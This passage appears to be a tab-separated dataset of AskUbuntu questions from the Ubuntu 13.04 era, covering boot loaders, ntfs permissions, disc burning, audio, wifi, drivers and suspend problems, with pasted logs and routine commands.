i do not have the permissions to do that and i have no clue how to get permission from my usb .
287430	nautilus-compare ( meld integration with nautilus ) and other nautilus-actions-extra packages not working with ubuntu 13.04	i had nautilus-compare ( and other nautilus-actions-extra packages ) perfectly working with ubuntu 12.04 i 've just did a fresh install of ubuntu raring ringtail , and then i ran sudo apt-get install meld nautilus-compare nautilus -q but the extra context menu ( s ) does n't show up has anybody else had this trouble ? in that case where should i file this bug ? thanks a lot
287431	ubuntu 13.04 firefox 20.0 and yahoo mail	just installed 13.04 with built-in firefox 20.0 . strangely enough in yahoo mail i can not view contents of any mail folder except inbox . any other folder ( sent , trash , etc ) when clicked wo n't open but for a fraction of a second , then disappear , and contents of inbox are shown again . and it keeps checking for new mail every 5 seconds ! 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux
287434	making windows boot loader the default instead of grub 2	so basically before ubuntu 13.04 i was running 12.10 . i had windows boot loader the default . if i chose to boot to ubuntu , it would go into grub , but grub was set to 0 seconds so it would basically skip grub and just go straight into ubuntu . now , after upgrading , grub is back . i used easybcd to get everything correct on the windows side but now i can not figure out for my life how to get grub to appear after windows boot loader . i tried to go into the grub config and change the default to 4 , which is the line where windows is on . all that did was highlight windows on start instead of going straight into the windows boot loader first . i also tried to use boot repair to change `` os to boot to by default '' to windows , which also did not work . can someone please help me get it back to how it was ? i 've been trying for hours .
287436	ntfs-3g permissions and inherit fstab flag	i 'm trying to user a ntfs filesystem with full acs 's set just like windows . everything is working fine except the permissions set to created files . here is my environment : fstab : /dev/disk/by-uuid/2e3219c021dd4d99 /mnt/data ntfs-3g x-gvfs-show , x-gvfs-name=data , defaults , permissions , inherit 0 0 mount output : /dev/sda7 on /mnt/data type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 files and folders : marianna @ server : /mnt/data $ ls -l total 0 drwxrws -- - 1 root data 0 abr 28 13:34 clientes drwxrws -- - 1 root folhamatic 0 abr 28 14:01 folhamatic drwxrwsr-x 1 root data 0 abr 28 13:59 suporte drwxr-s -- - 1 marianna data 48 abr 28 15:04 treinamentos marianna @ server : /mnt/data $ cd treinamentos/ marianna @ server : /mnt/data/treinamentos $ touch test.txt marianna @ server : /mnt/data/treinamentos $ ls -l total 0 -rw-rw-r -- 1 marianna marianna 0 abr 28 15:04 test.txt marianna @ server : /mnt/data/treinamentos $ the problem is i expect that the created test.txt have the group and permissions of parent folder . is that a way to achieve that ? the folder `` treinamentos '' already have the group sticky but it has no effect . thanks !
287440	ubuntu 13.04 automatic reconnect to hidden wireless network	i updated form 12.10 to 13.04 and computer will not automatically reconnect to hidden wireless network anymore , have to manually connect every time after booting .
287441	different uses of term `` efi partition ''	i installed kubuntu on a macbook pro 8,2 and am trying to get it from legacy to efi boot . kubuntu forced me to create an `` efiboot partition of at least 1 mib '' ( fs id 'ee ' ) . thats just the successor of the mbr in disguise , is n't it ? in the tutorials for grub-efi-amd64 , there 's always references to the `` efi partition '' , a fat16 of at least 200 mib . this is independent of the first one and has to be created , right ? i could shrink my home-partition and append this as sda5 , or is it critical , where the partition is located ?
287444	how to clean the clipboard ?	i am really used to windows and the problem of the clipboard retaining information which a third party could see , which thing actually happened to me on a link off of bbc.co.uk . therefore i found clipboard cleaner on line free . with an icon pushed , the clipboard is cleaned and safe . so , what about ubuntu ?
287445	how to disable windows effects in 13.04 ?	new install of 13.04 on a thinkpad x230 . i want to disable the windows effects ( they sort of zoom in and out from the middle of the screen ) . i find it distracting . i tried downloading the compizconfig settings manager and un-checking `` animations '' , `` fading windows '' and `` window decoration '' . but nothing changed . is there another way to lose these effects ?
287455	i ca n't burn the ubuntu iso image	thanks in advance for your help here it is the k3b log saved : devices -- -- -- -- -- -- -- -- -- -- -- - pioneer dvd-rw dvr-k16ra 1.16 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd-r dl , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-r dual layer jump , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r , restricted overwrite , layer jump ] [ % 7 ] system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.9.5 qt version : 4.8.3 kernel : 3.7.0-7-generic used versions -- -- -- -- -- -- -- -- -- -- -- - cdrecord : 3.0 cdrecord -- -- -- -- -- -- -- -- -- -- -- - scsidev : '/dev/sr0' devname : '/dev/sr0' scsibus : -2 target : -2 lun : -2 warning : open by 'devname ' is unintentional and not supported . linux sg driver version : 3.5.27 scsi buffer size : 64512 /usr/bin/cdrecord : warning : can not read drive buffer . /usr/bin/cdrecord : warning : the dma speed test has been skipped . cdrecord-prodvd-probd-clone 3.00 ( i686-pc-linux-gnu ) copyright ( c ) 1995-2010 jďż˝rg schilling toc type : 1 = cd-rom using libscg version 'schily-0.9 ' . driveropts : 'burnfree' atapi : 1 device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'pioneer ' identifikation : 'dvd-rw dvr-k16ra' revision : '1.16' device seems to be : generic mmc2 dvd-r/dvd-rw/dvd-ram . current : cd-r profile : dvd+r/dl profile : dvd+r profile : dvd+rw profile : dvd-r/dl layer jump recording profile : dvd-r/dl sequential recording profile : dvd-rw sequential recording profile : dvd-rw restricted overwrite profile : dvd-r sequential recording profile : dvd-rom profile : cd-rw profile : cd-r ( current ) profile : cd-rom using generic scsi-3/mmc cd-r/cd-rw driver ( mmc_cdr ) . driver flags : mmc-3 swabaudio burnfree supported modes : tao packet sao sao/r96p sao/r96r raw/r16 raw/r96p raw/r96r layer_jump drive buf size : 1267712 = 1238 kb fifo size : 4194304 = 4096 kb track 01 : data 693 mb total size : 796 mb ( 78:52.88 ) = 354966 sectors lout start : 796 mb ( 78:54/66 ) = 354966 sectors current secsize : 2048 atip info from disk : indicated writing power : 4 disk is not unrestricted disk is not erasable disk sub type : medium type a , low beta category ( a- ) ( 2 ) atip start of lead in : -12508 ( 97:15/17 ) atip start of lead out : 359845 ( 79:59/70 ) disk type : short strategy type ( phthalocyanine or similar ) manuf . index : 22 manufacturer : ritek co. capacity blklen/sparesz . format-type type 0 2048 0x00 unformated or blank media blocks total : 359845 blocks current : 359845 blocks remaining : 4879 starting to write cd/dvd/bd at speed 24 in real force sao mode for single session . last chance to quit , starting real write in 3 seconds . 2 seconds . 1 seconds . 0 seconds . operation starts . waiting for reader process to fill input buffer ... input buffer ready . burn-free is off . turning burn-free on performing opc ... sending cue sheet ... writing pregap for track 1 at -150 starting new track at sector : 0 track 01 : 0 of 693 mb written . track 01 : 1 of 693 mb written ( fifo 98 % ) 0.4x . track 01 : 2 of 693 mb written ( fifo 100 % ) [ buf 96 % ] 10.1x . track 01 : 3 of 693 mb written ( fifo 98 % ) [ buf 96 % ] 10.7x . track 01 : 4 of 693 mb written ( fifo 96 % ) [ buf 27 % ] 2.4x . /usr/bin/cdrecord : input/output error . write_g1 : scsi sendcmd : no error cdb : 2a 00 00 00 09 b0 00 00 1f 00 status : 0x2 ( check condition ) sense bytes : 71 00 03 00 00 27 34 0e 00 00 00 00 0c 00 00 00 sense key : 0x3 medium error , deferred error , segment 0 sense code : 0x0c qual 0x00 ( write error ) fru 0x0 sense flags : blk 10036 ( not valid ) cmd finished after 0.001s timeout 200s /usr/bin/cdrecord : a write error occured . /usr/bin/cdrecord : please properly read the error message above . write track data : error after 5079040 bytes writing time : 56.095s average write speed 167.0x . min drive buffer fill was 27 % fixating ... fixating time : 0.012s /usr/bin/cdrecord : fifo had 144 puts and 81 gets . /usr/bin/cdrecord : fifo was 0 times empty and 40 times full , min fill was 82 % . cdrecord command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/cdrecord -v gracetime=2 dev=/dev/sr0 speed=24 -sao driveropts=burnfree -force -data -tsize=354966s -
287459	screen does n't dim down to save power on ubuntu 13.04	while idling my screen does not dim down to save power on my thinkpad t430 . i use acpi_osi= ' ! windows 2012' to fix dimming for function keys . on some days while the beta dimming to save power works for me , since release it does not .
287461	using avconv , when remuxing to mkv , is there a way to fix packed avi input files ?	due to compatibility bugs between plex server and panasonic tvs , the only way to get it to work well is remux everything to mkv , straight copy all streams ( video , audio , subtitle ) seems simple enough : avconv -i `` input.avi '' -c copy `` output.mkv '' except : avconv version 0.8.6-4:0.8.6-0ubuntu0.12.04.1 , copyright ( c ) 2000-2013 the libav developers built on apr 2 2013 17:00:59 with gcc 4.6.3 [ mpeg4 @ 0x8422140 ] invalid and inefficient vfw-avi packed b frames detected input # 0 , avi , from 'input.avi ' : metadata : encoder : virtualdubmod 1.5.4.1 ( build 2117/release ) duration : 00:27:38.52 , start : 0.000000 , bitrate : 1173 kb/s stream # 0.0 : video : mpeg4 ( advanced simple profile ) , yuv420p , 640x352 [ par 1:1 dar 20:11 ] , 25 tbr , 25 tbn , 25 tbc stream # 0.1 : audio : mp3 , 48000 hz , stereo , s16 , 132 kb/s file 'output.mkv ' already exists . overwrite ? [ y/n ] y output # 0 , matroska , to 'output.mkv ' : metadata : encoder : lavf53.21.1 stream # 0.0 : video : mpeg4 , yuv420p , 640x352 [ par 1:1 dar 20:11 ] , q=2-31 , 1k tbn , 25 tbc stream # 0.1 : audio : libmp3lame , 48000 hz , stereo , 132 kb/s stream mapping : stream # 0:0 - > # 0:0 ( copy ) stream # 0:1 - > # 0:1 ( copy ) press ctrl-c to stop encoding [ matroska @ 0x8422cc0 ] ca n't write packet with unknown timestamp av_interleaved_write_frame ( ) : invalid argument with the relevant gotcha lines being : [ mpeg4 @ 0x8422140 ] invalid and inefficient vfw-avi packed b frames detected # < snip > [ matroska @ 0x8422cc0 ] ca n't write packet with unknown timestamp av_interleaved_write_frame ( ) : invalid argument i ca n't see an option to unpack the b frames ( or build a vbr timemap ? do we need those in avconv ? ) is there a way to do this , like in avidemux ?
287463	ubuntu ca n't read drivers or freezes such as external keyboard , monitor and mouse	ubuntu ca n't read drivers such as external keyboard , monitor and mouse . after i forced shutdown ubuntu , because of the add-on ( from ff ) i have to shut it down it hanged my pc . also the wireless connection is gone . no external monitor , they ca n't detect keyboard but , the laptop 's keyboard is detected also the mouse . currently i have to use windows to ask question because i ca n't use ubuntu i need external monitor to use it . ===== update ====== i chose the `` advance option for ubuntu '' then i chose the third one and everything went fine . the keyboard the monitor the mouse is now working . ok so i tried the other ubuntu with linux-version-generic-something ? what is this by the way ? i think the problem was the other one , the first one . still want to know how to fix . wahaha i got rid off of windows again . yahoo . please save me i do n't like using w - - - - - s. xd oh ! and i downloaded 13.04 just in case we ca n't fix this thing and reinstall ubuntu using 13.04 . i already downloaded 13.04 iso file and back-ed up my home folder . one more thing , the problem now is how can i make that advance-option-choice as my default , not until i install 13.04 ? or it will be fixed if i will upgrade in 13.04 soon ? thank you . ==d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b d ( o , o ) b== [ ok so i was looking for some way to know what really happened but , i 'm not sure if this xorg.0.log ( in system log ) is the right place to look and i found out that they disabled the `` kbd '' ? `` mouse '' ? `` vmmouse '' ? ] [ 42.362 ] x.org x server 1.13.0 release date : 2012-09-05 [ 42.362 ] x protocol version 11 , revision 0 [ 42.362 ] build operating system : linux 3.2.0-37-generic i686 ubuntu [ 42.362 ] current operating system : linux ubuntu 3.5.0-23-generic # 35-ubuntu smp thu jan 24 13:05:29 utc 2013 i686 [ 42.362 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-23-generic root=uuid=6c2eb8992eb85e30 loop=/ubuntu/disks/root.disk ro drm.debug=0xe plymouth : debug [ 42.363 ] build date : 11 april 2013 12:55:37pm [ 42.363 ] xorg-server 2:1.13.0-0ubuntu6.2 ( for technical support please see http : //www.ubuntu.com/support ) [ 42.363 ] current version of pixman : 0.26.0 [ 42.363 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 42.363 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 42.363 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : tue apr 30 10:45:42 2013 [ 42.363 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 42.363 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 42.364 ] ( == ) serverlayout `` layout0 '' [ 42.364 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 42.364 ] ( ** ) | | -- > monitor `` monitor0 '' [ 42.364 ] ( ** ) | | -- > device `` device0 '' [ 42.364 ] ( ** ) | -- > input device `` keyboard0 '' [ 42.364 ] ( ** ) | -- > input device `` mouse0 '' [ 42.364 ] ( == ) automatically adding devices [ 42.364 ] ( == ) automatically enabling devices [ 42.364 ] ( == ) automatically adding gpu devices [ 42.368 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 42.368 ] entry deleted from font path . [ 42.368 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 42.368 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 42.368 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 42.368 ] ( ww ) disabling keyboard0 [ 42.368 ] ( ww ) disabling mouse0 [ 42.368 ] ( ii ) loader magic : 0xb773f640 [ 42.368 ] ( ii ) module abi versions : [ 42.368 ] x.org ansi c emulation : 0.4 [ 42.368 ] x.org video driver : 13.0 [ 42.368 ] x.org xinput driver : 18.0 [ 42.368 ] x.org server extension : 7.0 [ 42.368 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 42.371 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:27a2:17aa:3801 rev 3 , mem @ 0xd4200000/524288 , 0xc0000000/268435456 , 0xd4300000/262144 , i/o @ 0x00001800/8 [ 42.371 ] ( -- ) pci : ( 0:0:2:1 ) 8086:27a6:17aa:3801 rev 3 , mem @ 0xd4280000/524288 [ 42.371 ] ( ii ) open acpi successful ( /var/run/acpid.socket )
287464	backup for ubuntu 12.04 not deja dup	i am interested in a backup solution ( alternative to deja dup , as i do not like its characteristics ) my requirements : r-sync or differential backup to ftp server store files as-is ( if file name is a.txt , store as a.txt , not compressed or encrypted ) previous file support is not required . for ubuntu 12.04 desktop . suggestions ?
287467	how to define which kernel module to use for a device	everything was working fine when i had just installed raring . my wireless device was using the bcma-pci-bridge module and my access to the internet was flawless . then , i decided to update my packages , as recommended by the blinking icon on the leftside bar . without my consent , ubuntu switched to the wl kernel module , and now my wireless is not working anymore with my dual-band cisco e4200 wireless router . how can i go back to bcma-pci-bridge ? the output of lspci -nn -d 14e4 : 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5764m gigabit ethernet pcie [ 14e4:1684 ] ( rev 10 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43224 802.11a/b/g/n [ 14e4:4353 ] ( rev 01 ) although i believe the ethernet card does n't matter , does it ? edit : i was trying to modprobe bcma-pci-bridge , but it turns out that i had to just modprobe bcma instead . now i have the bcma-pci-bridge module working again . for the record , i 'm using ubuntu raring 64 bits with on a macbook pro 6,2 ( mid 2010 ) with kernel 3.8.0-19-generic .
287469	ubuntu 13.04 terminal closes when minimized	my terminal window closes when minimized or when i maximize other program window . this is not useful when coping and pasting commands lines ... also the terminal window do not appear in the launch bar when actived what 's happening ?
287470	libreoffice 4.0 does n't show modules writer , calc , etc anymore	i have n't used it for about 2 weeks and today when i wanted to start and .odt file i found out that it does n't work anymore . i ca n't find writer and the rest of them in the search lense but the files with the libreoffice extensions still have libreoffice thumbnails . the only thing i can find is libreoffice and this appears when i open it ( all modules are grayed out ) i installed 4.0 about a month ago , uninstalling 3.5 that came with ubuntu 12.04 . it worked great this is not a dublicate as far as i know , the other having problems not seeing the modules in the launcher but they can start them
287471	how can i make the nvidia hdmi sound work ?	i 'm new in the ubuntu scene and i cant make the sound come out through the hdmi port . i was able to install the nvidiaa driver properly for my gefoerce 220 graphics card , i set up alsa and made the nvidida card the default . still i got no option on settings to set the audio output to hdmi . please help me , i do not want to go back to windows
287473	shutdown button does n't shut down computer on ubuntu 13.04	i am having latitude d520 and i installed 12.10 in which wireless card was not working so i installed 13.04 through bootable usb but shut down button is not shutting down the computer . it is getting off from os and stopping on the black screen with following message : the system is going down for power off now ! acpid : exiting speech-dispatcher disabled : edit /etc/default/speech-dispatcher so please someone can help me with debugging this issue ? thanks in advavnce , nishant
287480	can my notebook manage ubuntu as a host and kali as a guest and which virtual machine should i use ?	i want to erase windows and install ubuntu as a host and kali as a guest . and the question arises : can my dell latitude 120l ( intel m 1.73gh prossesor 2gb of ram 80gb hdd ) handle this task and which virtual machine should i use ( i 'm using vmware 7 workstation under win7 but it seems a little heavy )
287481	any way to revert the behavior of typing in files ?	in the default file manager in ubuntu 13.04 , typing produces different behavior : it used to try to match what you type as a prefix to some file in the current directory ; now , it initiates what looks like a recursive substring/subsequence search for files . is there any way to restore the previous behavior ?
287482	no sound in the new upgrade ! why did this happen ?	hello i like the new look of your up grade to 13.04 i am trying to get my sound to work the sounds says that it is a dummy sound how come the sound card is not working
287496	keep losing wifi connection : realtek rtl8188ce	my wifi connection keeps dropping . wireless card is a realtek rtl8188ce , on a thinkpad t430 . it seems to be something to do with the arp table : whenever it drops i see unanswered arp requests from my computer asking what mac 192.168.2.1 ( my router ) has . turning on and off wifi seems to fix it for about a minute , but then the problem comes back . this is quite a big problem . i 'm unable to use the wifi for longer than about a minute .
287498	how to retrieve old facebook/xmpp messages as well as new with kopete ?	i have been considering using kopete to use facebook chat instead of logging on to facebook with a web browser . that way , i can integrate messages with my kde desktop better . the problem is , when i open kopete , i am unable to see messages that i recieved in facebook while kopete was not opened . i can only see messages that i sent or received when kopete was open . the same thing happens in outlook.com ( which is a website that connects to facebook ) , pidgin software , and other instant messaging tools . so my question is , how can i receive these messages with a desktop chat application in kde , such as kopete ? facebook has made their api publicly available to developers , and kde has its own facebook integration plugin . so it would seem achievable .
287499	how can i install ubuntu 13.04 on my usb stick and make it bootable to windows 8 ?	i used the instructions listed on http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows and i used a 4gb flash drive to try to install ubuntu on my lenovo p500 preinstalled with windows 8 . i want to make a bootable usb stick but it wo n't work . i 've read some stuff about secureboot and uefi on windows 8 computers but i want to make sure that absolutely every change i do to my computer in order to boot ubuntu from my usb is reversible . i am completely new to linux , but i want to try it out . all help is appreciated . thanks .
287500	recording in gnome stopped working after gsettings editing	i was looking for a way to record audio with video on gnome shell ( ubuntu 13.04 ) and after doing these command : gsettings set org.gnome.shell.recorder pipeline `` queue ! videorate ! vp8enc quality=10 speed=2 ! mux . pulsesrc ! audio/x-raw-int ! queue ! audioconvert ! vorbisenc ! mux . webmmux name=mux '' recording stopped working . i found this solution here . any help would be nice .
287503	does lvm enable me to resize my /home partition ?	with 13.04 here , i 'm planning on wiping my computer and reinstalling . i have two hard drives , and i 've heard that lvm allows the two drives to work together , as if they are a single drive . i 've also heard that it 's useful to have a separate /home partition , so it 's easier to reinstall and not have to worry about your files being overwritten ; however , apparently you ca n't resize the /home partition , which could potentially be annoying . i believe lvm makes partition management easier , so if i use lvm and have /home on a separate partition in the lvm setup , will i be able to resize my /home partition post-installation ? ( also , feel free to correct me if any of my above assumptions about lvm or anything are unclear/incorrect )
287507	electricsheep not working in raring 13.04	i just downloaded electricsheep four days before i updated my ubuntu software and i fell in love with it . after i upgraded to 13.04 , i 'm kind of upset in saying that electricsheep no longer works . i have no idea how to fix it and i feel helpless with linux . as i said , it was working completely fine in 12.10 , but now with the raring ringtail update : i use xscreensaver to launch electricsheep . when i open xscreensaver , `` electricsheep '' is one of the options to choose . when i `` preview '' es or even launch the `` xscreensaver-demo '' in the terminal , it does n't work anymore ; i get an error message . the error message says : '' detected another electric sheep process . rendering of sheep is disabled using read only access . '' damnit , can someone please help me ? i want my trippy screensaver back , it should n't be this hard ! edit : i contacted the creator of electricsheep ( scott draves ) via the link to his email address on his personal website and asked for his assistance . hopefully the askubuntu community will be able to fix this problem , i 'm sure i am not the only one who is having this problem as i have searched and searched .
287509	how to increase the screen brightness control sensitivity ?	in ubuntu 13.04 , when i use the keyboard hotkeys to control my screen brightness , i only get 5 steps to go from the darkest to the brightest level , for a total of 6 levels . however , i noticed a really strange behavior . if i click in any indicator , for example , in the clock so the calendar is displayed , while the menu ( in this example , the calendar ) is being displayed , i get 15 steps to go from the darkest to the brightest level , for a total of 16 levels , but i do n't get the on-screen brightness notification though . this also occurs when the screen is locked . maybe you , dear reader , have n't noticed this behavior so please try it . this shows that somehow ubuntu knows how to make use of the full brightness sensitivity , but it fails to do so under `` normal '' conditions ( e.g . while a indicator menu is not being displayed , or the screen is not locked ) . it also seems that the thing responsible for the on-screen brightness notification is doubling or tripling the brightness change on every step . having only 6 levels of brightness is very problematic because you ca n't adjust correctly the brightness according to the changing lighting conditions of your environment . in windows in the same laptop , i get 16 levels of brightness as well . how can i improve/increase the screen brightness sensitivity permanently ? perhaps disabling the on-screen brightness notification ? i could live without it if i get the brightness sensitivity back .
287510	diskspace status bar missing after ubuntu 13.04 update	after updating ubuntu 12.10 to 13.04 the disk space remaining on the bottom of the nautilus status bar is now missing . the updated filemanager files , does not seem to have any settings that i can display this with . how do i get it to display the current diskspace remaining on the current drive , at the bottom of the screen .
287511	mp3 quality bad when running on virtualbox	mp3 files do not sound good when i use mplayer in ubuntu 12.04 . i am running ubuntu on a imac in virtualbox . the bigger mp3 files have a lower sound quality than the smaller mp3 files i listen to . i 've noticed that it seems like the number of tabs in firefox that are open seems to have an affect but not all the time . the mp3 will sound fine for a while then for a couple of seconds it will sound scratchy and then a couple of seconds later it sounds fine . has anyone else had a problem like this or have any ideas how to stop the audio quality from dropping in and out .
287516	why is ubuntu 12.04 resuming from suspend within 2 minutes ?	i set up wake on lan as per instructions i found online . i set up suspend to use hybrid-suspend ; the system will suspend automatically if no activity for allotted time . if i send a magic packet from another computer system resumes as expected . the problem is that even if i have my other computers off , the system will automatically resume within approximately 2 minutes .
287517	how to run ubuntu 13.04 with 3d acceleration using intel hd 4000 ?	when my system boot and try to load ubuntu , i have only a graphic bug in the screen . i tried to use the nomode set mode and it works , but i do n't have 3d acceleration and donâ´t have any drivers to install .
287522	ubuntu 13.04 : dummy output after reboot	i have got problem with audio ( audio device : intel corporation 6 series/c200 series chipset family high definition audio controller as lspci says ) on my laptop hp probook 4530s with ubuntu 13.04 and kernel 3.8.0-19 . sometimes it stops working ( not during work , before loging ) , reboot usually helps but it is annoying and next time again there wo n't be sound . audio settings shows only `` dummy output '' . dmesg says interesting thing : http : //pastebin.com/vufq7xpp had anyone similar problem ?
287524	firefox/chrome links slow unless i type url directly in address bar	my web browser has become slow . google works fine , but clicking on any link takes forever with `` waiting for xxxx.xx '' . strange bit is , if i click in the address bar and highlight the url , then press enter , it loads instantaneously . i 'm running ubuntu 12.10 with firefox and chrome ( which also does the same thing ) .
287525	thunderbird missing from messaging menu & dash	i no longer need this issue solved as i have replaced ubuntu with a different os ( nothing wrong with ubuntu , just fancied a change ) . i reinstalled ubuntu into a virtual machine and thunderbird began appearing . i did uninstall thunderbird and reinstall it , so there maybe a chance that a dependency was not satisfied or whatnot . i know i keep seeming to have a problem with every distribution , but this time i have no idea ... again , as to why this is occurring ! if i search for thunderbird in the home and applications sections of the dash i get no results , whether it is installed or not . in fact , it does n't even appear as a store result ! i checked /usr/share/applications and lo and behold ... thunderbird is there ! in fact , typing 'thunderbird ' in terminal opens it ! this is also the case with the messaging applet or whatever it is called ( envelope in the notification area ) . it has the permission to appear in that menu according to dconf-editor , alas it decides not to . does anyone have any idea what could possibly cause this ? i am using ubuntu 13.04 , and i will provide further information if needed . this is not essential but it is one of those small problems that bugs you to find a fix for . i 'm not sure what part of the desktop file if any could cause this problem . any help would be appreciated ! and maybe i might stop breaking it soon . ( no idea if this helps or not but i did install thunar and use that as my default file application thing , although problem occurred before installing that ) . edit : my thunderbird.desktop file if that helps at all , considering the dash and mmu both use this to discover it . translations have been trimmed . [ desktop entry ] encoding=utf-8 name=thunderbird mail comment=send and receive mail with thunderbird genericname=mail client keywords=email ; e-mail ; newsgroup ; feed ; rss exec=thunderbird % u terminal=false x-multipleargs=false type=application icon=thunderbird categories=application ; network ; email ; mimetype=x-scheme-handler/mailto ; application/x-xpinstall ; startupnotify=true actions=compose ; contacts [ desktop action compose ] name=compose new message exec=thunderbird -compose onlyshowin=messaging menu ; unity ; [ desktop action contacts ] name=contacts exec=thunderbird -addressbook onlyshowin=messaging menu ; unity ; and if any further help , this is what appears when i open thunderbird via terminal . ( process:2739 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed ** ( thunderbird:2739 ) : warning ** : could not find the desktop file for 'thunderbird.desktop' ( thunderbird:2739 ) : glib-gobject-warning ** : /build/buildd/glib2.0-2.36.0/./gobject/gsignal.c:3429 : signal name `selection_changed ' is invalid for instance `0x7f9818072190 ' of type `maiatktype3
287526	how to add more languages docs to devhelp ? ( java etc )	i was wondering if there is a way to add more languages ( such as java , c , c++ etc ) to devhelp . i know that there is a software named zeal , but dev help seems to be more mature . by the way , i 'm on ubuntu 13.04
287527	trying to set up vpn	i have been trying to set up a vpn using ubuntuâs built in feature to connect with another computer , but whenever i see a tutorial , next to their network thing in the top bar they have 2 arrows but i do not . i would appreciate if someone could tell me how to find the little arrow thing , i donât know what it is called .
287529	installing ubuntu 13.04 desktop amd64 using bootable usb-stick failed	i created a bootable usb-stick using the pendrive universal usb installer as suggested on the ubuntu website , because i want to install ubuntu 13.04 desktob amd64 . when i turned on my pc with the usb-stick inserted , it found it , but told me this : syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h : peter anvin et al error : no configuration file found no default or ui configuration directive found boot : my pc is an acer travelmate with 4 gb ram and currently a 64bit system . does anyone have an idea what the problem is and what i can do to make it work ? ( i 'm a total newcomer to ubuntu ) thanks !
287532	how do i resolve slow and choppy performance in virtualbox ?	both , ubuntu 12.10 and 13.04 perform very slow when running in virtualbox 4.2.12 . how do i run ubuntu with unity or enabled transparency smoothly with virtualbox ?
287544	why the login screen still ask for a password after remove it ?	i removed my password and now when i go to the login screen it asks for one and my old password wont work . what do i do ?
287546	`` failed to retrieve share list from server : no such file or directory '' while trying to access windows shares	i keep getting `` failed to retrieve share list from server : no such file or directory '' when i try viewing my shared files in ubuntu 13.04 and they were all working fine until the upgrade ! help !
287549	unity is not working after installing nvidia-313 drivers	neither the window manager , i just installed ubuntu 13.04 in a hp pavilion dv2000 , the installation was fine except for some annoying graphic glitches , so i decide to install the nvidia drivers from xorg-edgers/319 , when i rebooted the laptop , unity was gone . i tried by installiin th elinux.generic-headers , installing th 173 and current package instead of the 319 from xorg-edgers , but nothing . any thoughts on how to fix it ?
287550	how do i correctly bump the version number when building a kernel package from git ?	when building a patched kernel from ubuntu kernel git repositories how do i change the version numbers so that the resulting kernel package has the following properties : installs files in /boot/ which are named differently than the current official kernel on which it is based , and thus do not conflict . appears `` newer '' than the current official kernel on which it is based , so it is automatically selected at boot time . appears older than the next official kernel release , so that it will be replaced when there is a kernel update .
287551	is there any remote browsing solution with images ?	i need a browser for my linux server . my server google queries are banned . it asking for captcha , but i can`t write in w3m , cos i do n't see the image . is there any solution for this ?
287552	package manager/update problem	i recently downloaded virtualbox version 4.2.12 , and i clicked the .deb file , which brought up the ubuntu software center . i clicked upgrade as i had a previous version installed , and it did it successfully . then when i rebooted ubuntu , i got a serious error from package manager saying : `` unknown error : '' ( e : the package virtualbox-4.2 needs to be reinstalled , but i ca n't find an archive for it . '' then it goes on to say : `` this usually means that your installed packages have unmet dependencies . '' strangely , the ubuntu software center did n't give a notification about unmet dependencies . since then , ubuntu software center and package manager ca n't update , install and uninstall software . i also recently upgraded to ubuntu 13.04 the day that it came out , if that helps .
287557	lenovo t400 hangs after resume from suspend in raring ringtail	i 've upgraded from ubuntu 12.10 to 13.04 recently and now my system hangs if i resume from suspend . any suggestions how to fix this or how to diagnose the problem ? its a lenovo t400 laptop . update : the behaviour is slightly different from what i wrote first . after a resume i can still use the system for about 5-30 seconds , before the mouse pointer gradually slows down and the laptop grinds to a total halt . workaround a workaround that seems to be working for me if i 'm quick enough : if i change to a console window ( ctrl + alt + f1 ) before the mouse pointer hangs , the system runs after a resume .
